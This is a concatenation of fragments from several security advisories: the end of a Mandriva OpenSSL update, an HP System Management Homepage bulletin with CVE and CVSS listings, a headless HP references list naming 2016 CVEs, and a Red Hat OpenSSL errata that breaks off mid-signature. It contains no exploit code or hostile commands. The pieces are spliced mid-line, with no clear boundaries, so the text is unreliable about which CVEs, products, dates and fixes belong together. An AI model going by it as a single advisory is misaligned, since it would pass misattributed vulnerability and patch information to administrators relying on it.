http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3470\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3513\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3567\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3569\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3570\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3571\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3572\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8275\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0204\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0205\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0206\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0209\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0286\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0287\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0288\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0289\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0293\n http://openssl.org/news/secadv_20150108.txt\n http://openssl.org/news/secadv_20150319.txt\n _______________________________________________________________________\n\n Updated Packages:\n\n Mandriva Business Server 2/X86_64:\n 324a85f7e1165ab02881e44dbddaf599 mbs2/x86_64/lib64openssl1.0.0-1.0.1m-1.mbs2.x86_64.rpm\n 9c0bfb6ebd43cb6d81872abf71b4f85f mbs2/x86_64/lib64openssl-devel-1.0.1m-1.mbs2.x86_64.rpm\n 58df54e72ca7270210c7d8dd23df402b mbs2/x86_64/lib64openssl-engines1.0.0-1.0.1m-1.mbs2.x86_64.rpm\n b5313ffb5baaa65aea05eb05486d309a mbs2/x86_64/lib64openssl-static-devel-1.0.1m-1.mbs2.x86_64.rpm\n a9890ce4c33630cb9e00f3b2910dd784 mbs2/x86_64/openssl-1.0.1m-1.mbs2.x86_64.rpm \n 521297a5fe26e2de0c1222d8d03382d1 mbs2/SRPMS/openssl-1.0.1m-1.mbs2.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\n of md5 checksums and GPG signatures is performed automatically for you. You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n http://www.mandriva.com/en/support/security/advisories/\n\n If you want to report vulnerabilities, please contact\n\n security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID Date User ID\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\n \u003csecurity*mandriva.com\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.12 (GNU/Linux)\n\niD8DBQFVFTm1mqjQ0CJFipgRAoYFAKCaubn00colzVNnUBFjSElyDptGMQCfaGoS\nkz0ex6eI6hA6qSwklA2NoXY=\n=GYjX\n-----END PGP SIGNATURE-----\n. \n\nRelease Date: 2015-07-20\nLast Updated: 2015-07-20\n\nPotential Security Impact: Remote Denial of Service (DoS), cross-site request\nforgery (CSRF), execution of arbitrary code, unauthorized modification,\nunauthorized access, disclosure of information\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nMultiple potential security vulnerabilities have been identified with HP\nSystem Management Homepage (SMH) on Linux and Windows. The vulnerabilities\ncould be exploited remotely resulting in Denial of Service (DoS), Cross-site\nRequest Forgery (CSRF), execution of arbitrary code, unauthorized\nmodification, unauthorized access, or disclosure of information. \n\nReferences:\n\nCVE-2014-0118 - Remote Denial of Service (DoS)\nCVE-2014-0226 - Remote Denial of Service (DoS)\nCVE-2014-0231 - Remote Denial of Service (DoS)\nCVE-2014-3523 - Remote Denial of Service (DoS)\nCVE-2014-3569 - Remote Denial of Service (DoS)\nCVE-2014-3570 - Remote Disclosure of Information\nCVE-2014-3571 - Remote Denial of Service (DoS)\nCVE-2014-3572 - Remote Disclosure of Information\nCVE-2014-8142 - Remote Code Execution\nCVE-2014-8275 - Unauthorized Modification\nCVE-2014-9427 - Remote Disclosure of Information\nCVE-2014-9652 - Remote Denial of Service (DoS)\nCVE-2014-9653 - Remote Denial of Service (DoS)\nCVE-2014-9705 - Remote Code Execution\nCVE-2015-0204 - Remote Disclosure of Information\nCVE-2015-0205 - Remote Unauthorized Access\nCVE-2015-0206 - Remote Denial of Service (DoS)\nCVE-2015-0207 - Remote Denial of Service (DoS)\nCVE-2015-0208 - Remote Denial of Service (DoS)\nCVE-2015-0209 - Remote Denial of Service (DoS)\nCVE-2015-0231 - Remote Denial of Service (DoS)\nCVE-2015-0232 - Remote Denial of Service (DoS), Execution of Arbitrary Code\nCVE-2015-0273 - Remote Execution of Arbitrary Code\nCVE-2015-0285 - Remote Disclosure of Information\nCVE-2015-0286 - Remote Denial of Service (DoS)\nCVE-2015-0287 - Remote Denial of Service (DoS)\nCVE-2015-0288 - Remote Denial of Service (DoS)\nCVE-2015-0289 - Remote Denial of Service (DoS)\nCVE-2015-0290 - Remote Denial of Service (DoS)\nCVE-2015-0291 - Remote Denial of Service (DoS)\nCVE-2015-0292 - Remote Denial of Service (DoS)\nCVE-2015-0293 - Remote Denial of Service (DoS)\nCVE-2015-1787 - Remote Denial of Service (DoS)\nCVE-2015-2301 - Remote Execution of Arbitrary Code\nCVE-2015-2331 - Remote Denial of Service (DoS), Execution of Arbitrary Code\nCVE-2015-2348 - Unauthorized Modification\nCVE-2015-2787 - Remote Execution of Arbitrary Code\nCVE-2015-2134 - Cross-site Request Forgery (CSRF)\nSSRT102109\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nHP System Management Homepage (SMH) prior to version 7.5.0\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2014-0118 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\nCVE-2014-0226 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\nCVE-2014-0231 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2014-3523 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2014-3569 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2014-3570 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2014-3571 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2014-3572 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2014-8142 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-8275 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2014-9427 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-9652 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2014-9653 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-9705 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2015-0204 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3\nCVE-2015-0205 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2015-0206 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-0207 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-0208 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\nCVE-2015-0209 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\nCVE-2015-0231 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2015-0232 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\nCVE-2015-0273 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2015-0285 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3\nCVE-2015-0286 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-0287 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-0288 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-0289 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-0290 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-0291 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-0292 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2015-0293 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-1787 (AV:N/AC:H/Au:N/C:N/I:N/A:P) 2.6\nCVE-2015-2301 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2015-2331 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2015-2348 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2015-2787 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2015-2134 (AV:N/AC:M/Au:S/C:P/I:P/A:P) 6.0\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has made the following software updates available to resolve the\nvulnerabilities for the impacted versions of HP System Management Homepage\n(SMH). \n\n Please download the latest version of HP System Management Homepage (7.5.0)\nfrom the following location:\n\n http://www.hp.com/go/smh\n\nHISTORY\nVersion:1 (rev.1) - 20 July 2015 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2015 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners. \n\nReferences:\n\nCVE-2015-1788\nCVE-2015-1789\nCVE-2015-1790\nCVE-2015-1791\nCVE-2015-1792\nCVE-2014-3569\nCVE-2015-0205\nCVE-2014-3508\nCVE-2014-3509\nCVE-2014-3511\nCVE-2014-3513\nCVE-2014-3567\nCVE-2014-3568\nCVE-2016-0705\nCVE-2016-0799\nCVE-2016-2842\nPSRT110092\nPSRT110095\nCVE-2016-2026\nCVE-2016-2027\nCVE-2016-2028\nCVE-2016-2029\nCVE-2016-2030\nCVE-2016-4357\nCVE-2009-3555\nCVE-2016-4358\nCVE-2015-3194\nCVE-2015-3195\nCVE-2015-6565\nCVE-2016-2017\nCVE-2016-2018\nCVE-2016-2019\nCVE-2016-2020\nCVE-2016-2021\nCVE-2016-2022\nCVE-2015-7501\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Moderate: openssl security update\nAdvisory ID: RHSA-2015:0066-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2015-0066.html\nIssue date: 2015-01-20\nUpdated on: 2015-01-21\nCVE Names: CVE-2014-3570 CVE-2014-3571 CVE-2014-3572 \n CVE-2014-8275 CVE-2015-0204 CVE-2015-0205 \n CVE-2015-0206 \n=====================================================================\n\n1. Summary:\n\nUpdated openssl packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6 and 7. \n\nRed Hat Product Security has rated this update as having Moderate security\nimpact. Common Vulnerability Scoring System (CVSS) base scores, which give\ndetailed severity ratings, are available for each vulnerability from the\nCVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Desktop (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server (v. 7) - ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - ppc64, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. Description:\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL),\nTransport Layer Security (TLS), and Datagram Transport Layer Security\n(DTLS) protocols, as well as a full-strength, general purpose cryptography\nlibrary. \n\nA NULL pointer dereference flaw was found in the DTLS implementation of\nOpenSSL. A remote attacker could send a specially crafted DTLS message,\nwhich would cause an OpenSSL server to crash. (CVE-2014-3571)\n\nA memory leak flaw was found in the way the dtls1_buffer_record() function\nof OpenSSL parsed certain DTLS messages. A remote attacker could send\nmultiple specially crafted DTLS messages to exhaust all available memory of\na DTLS server. (CVE-2015-0206)\n\nIt was found that OpenSSL\u0027s BigNumber Squaring implementation could produce\nincorrect results under certain special conditions. This flaw could\npossibly affect certain OpenSSL library functionality, such as RSA\nblinding. Note that this issue occurred rarely and with a low probability,\nand there is currently no known way of exploiting it. (CVE-2014-3570)\n\nIt was discovered that OpenSSL would perform an ECDH key exchange with a\nnon-ephemeral key even when the ephemeral ECDH cipher suite was selected. \nA malicious server could make a TLS/SSL client using OpenSSL use a weaker\nkey exchange method than the one requested by the user. (CVE-2014-3572)\n\nIt was discovered that OpenSSL would accept ephemeral RSA keys when using\nnon-export RSA cipher suites. A malicious server could make a TLS/SSL\nclient using OpenSSL use a weaker key exchange method. (CVE-2015-0204)\n\nMultiple flaws were found in the way OpenSSL parsed X.509 certificates. \nAn attacker could use these flaws to modify an X.509 certificate to produce\na certificate with a different fingerprint without invalidating its\nsignature, and possibly bypass fingerprint-based blacklisting in\napplications. (CVE-2014-8275)\n\nIt was found that an OpenSSL server would, under certain conditions, accept\nDiffie-Hellman client certificates without the use of a private key. \nAn attacker could use a user\u0027s client certificate to authenticate as that\nuser, without needing the private key. (CVE-2015-0205)\n\nAll OpenSSL users are advised to upgrade to these updated packages, which\ncontain a backported patch to mitigate the above issues. For the update to\ntake effect, all services linked to the OpenSSL library (such as httpd and\nother SSL-enabled services) must be restarted or the system rebooted. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata \nrelevant to your system have been applied. \n\nThis update is available via the Red Hat Network. Details on how to use the\nRed Hat Network to apply this update are available at \nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1180184 - CVE-2015-0204 openssl: Only allow ephemeral RSA keys in export ciphersuites\n1180185 - CVE-2014-3572 openssl: ECDH downgrade bug fix\n1180187 - CVE-2014-8275 openssl: Fix various certificate fingerprint issues\n1180234 - CVE-2014-3571 openssl: DTLS segmentation fault in dtls1_get_record\n1180235 - CVE-2015-0206 openssl: DTLS memory leak in dtls1_buffer_record\n1180239 - CVE-2015-0205 openssl: DH client certificates accepted without verification\n1180240 - CVE-2014-3570 openssl: Bignum squaring may produce incorrect results\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\nopenssl-1.0.1e-30.el6_6.5.src.rpm\n\ni386:\nopenssl-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm\n\nx86_64:\nopenssl-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-1.0.1e-30.el6_6.5.x86_64.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Optional (v. 6):\n\ni386:\nopenssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-devel-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-perl-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-static-1.0.1e-30.el6_6.5.i686.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm\nopenssl-devel-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-devel-1.0.1e-30.el6_6.5.x86_64.rpm\nopenssl-perl-1.0.1e-30.el6_6.5.x86_64.rpm\nopenssl-static-1.0.1e-30.el6_6.5.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\nopenssl-1.0.1e-30.el6_6.5.src.rpm\n\nx86_64:\nopenssl-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-1.0.1e-30.el6_6.5.x86_64.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm\nopenssl-devel-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-devel-1.0.1e-30.el6_6.5.x86_64.rpm\nopenssl-perl-1.0.1e-30.el6_6.5.x86_64.rpm\nopenssl-static-1.0.1e-30.el6_6.5.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\nopenssl-1.0.1e-30.el6_6.5.src.rpm\n\ni386:\nopenssl-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-devel-1.0.1e-30.el6_6.5.i686.rpm\n\nppc64:\nopenssl-1.0.1e-30.el6_6.5.ppc.rpm\nopenssl-1.0.1e-30.el6_6.5.ppc64.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.5.ppc.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.5.ppc64.rpm\nopenssl-devel-1.0.1e-30.el6_6.5.ppc.rpm\nopenssl-devel-1.0.1e-30.el6_6.5.ppc64.rpm\n\ns390x:\nopenssl-1.0.1e-30.el6_6.5.s390.rpm\nopenssl-1.0.1e-30.el6_6.5.s390x.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.5.s390.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.5.s390x.rpm\nopenssl-devel-1.0.1e-30.el6_6.5.s390.rpm\nopenssl-devel-1.0.1e-30.el6_6.5.s390x.rpm\n\nx86_64:\nopenssl-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-1.0.1e-30.el6_6.5.x86_64.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm\nopenssl-devel-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-devel-1.0.1e-30.el6_6.5.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 6):\n\ni386:\nopenssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-perl-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-static-1.0.1e-30.el6_6.5.i686.rpm\n\nppc64:\nopenssl-debuginfo-1.0.1e-30.el6_6.5.ppc64.rpm\nopenssl-perl-1.0.1e-30.el6_6.5.ppc64.rpm\nopenssl-static-1.0.1e-30.el6_6.5.ppc64.rpm\n\ns390x:\nopenssl-debuginfo-1.0.1e-30.el6_6.5.s390x.rpm\nopenssl-perl-1.0.1e-30.el6_6.5.s390x.rpm\nopenssl-static-1.0.1e-30.el6_6.5.s390x.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm\nopenssl-perl-1.0.1e-30.el6_6.5.x86_64.rpm\nopenssl-static-1.0.1e-30.el6_6.5.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nopenssl-1.0.1e-30.el6_6.5.src.rpm\n\ni386:\nopenssl-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-devel-1.0.1e-30.el6_6.5.i686.rpm\n\nx86_64:\nopenssl-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-1.0.1e-30.el6_6.5.x86_64.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm\nopenssl-devel-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-devel-1.0.1e-30.el6_6.5.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 6):\n\ni386:\nopenssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-perl-1.0.1e-30.el6_6.5.i686.rpm\nopenssl-static-1.0.1e-30.el6_6.5.i686.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm\nopenssl-perl-1.0.1e-30.el6_6.5.x86_64.rpm\nopenssl-static-1.0.1e-30.el6_6.5.x86_64.rpm\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nopenssl-1.0.1e-34.el7_0.7.src.rpm\n\nx86_64:\nopenssl-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-libs-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-libs-1.0.1e-34.el7_0.7.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-devel-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-devel-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-perl-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-static-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-static-1.0.1e-34.el7_0.7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nopenssl-1.0.1e-34.el7_0.7.src.rpm\n\nx86_64:\nopenssl-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-libs-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-libs-1.0.1e-34.el7_0.7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-devel-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-devel-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-perl-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-static-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-static-1.0.1e-34.el7_0.7.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nopenssl-1.0.1e-34.el7_0.7.src.rpm\n\nppc64:\nopenssl-1.0.1e-34.el7_0.7.ppc64.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.ppc.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.ppc64.rpm\nopenssl-devel-1.0.1e-34.el7_0.7.ppc.rpm\nopenssl-devel-1.0.1e-34.el7_0.7.ppc64.rpm\nopenssl-libs-1.0.1e-34.el7_0.7.ppc.rpm\nopenssl-libs-1.0.1e-34.el7_0.7.ppc64.rpm\n\ns390x:\nopenssl-1.0.1e-34.el7_0.7.s390x.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.s390.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.s390x.rpm\nopenssl-devel-1.0.1e-34.el7_0.7.s390.rpm\nopenssl-devel-1.0.1e-34.el7_0.7.s390x.rpm\nopenssl-libs-1.0.1e-34.el7_0.7.s390.rpm\nopenssl-libs-1.0.1e-34.el7_0.7.s390x.rpm\n\nx86_64:\nopenssl-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-devel-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-devel-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-libs-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-libs-1.0.1e-34.el7_0.7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nppc64:\nopenssl-debuginfo-1.0.1e-34.el7_0.7.ppc.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.ppc64.rpm\nopenssl-perl-1.0.1e-34.el7_0.7.ppc64.rpm\nopenssl-static-1.0.1e-34.el7_0.7.ppc.rpm\nopenssl-static-1.0.1e-34.el7_0.7.ppc64.rpm\n\ns390x:\nopenssl-debuginfo-1.0.1e-34.el7_0.7.s390.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.s390x.rpm\nopenssl-perl-1.0.1e-34.el7_0.7.s390x.rpm\nopenssl-static-1.0.1e-34.el7_0.7.s390.rpm\nopenssl-static-1.0.1e-34.el7_0.7.s390x.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-perl-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-static-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-static-1.0.1e-34.el7_0.7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nopenssl-1.0.1e-34.el7_0.7.src.rpm\n\nx86_64:\nopenssl-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-devel-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-devel-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-libs-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-libs-1.0.1e-34.el7_0.7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-perl-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-static-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-static-1.0.1e-34.el7_0.7.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2014-3570\nhttps://access.redhat.com/security/cve/CVE-2014-3571\nhttps://access.redhat.com/security/cve/CVE-2014-3572\nhttps://access.redhat.com/security/cve/CVE-2014-8275\nhttps://access.redhat.com/security/cve/CVE-2015-0204\nhttps://access.redhat.com/security/cve/CVE-2015-0205\nhttps://access.redhat.com/security/cve/CVE-2015-0206\nhttps://access.redhat.com/security/updates/classification/#moderate\nhttps://www.openssl.org/news/secadv_20150108.txt\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2015 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG 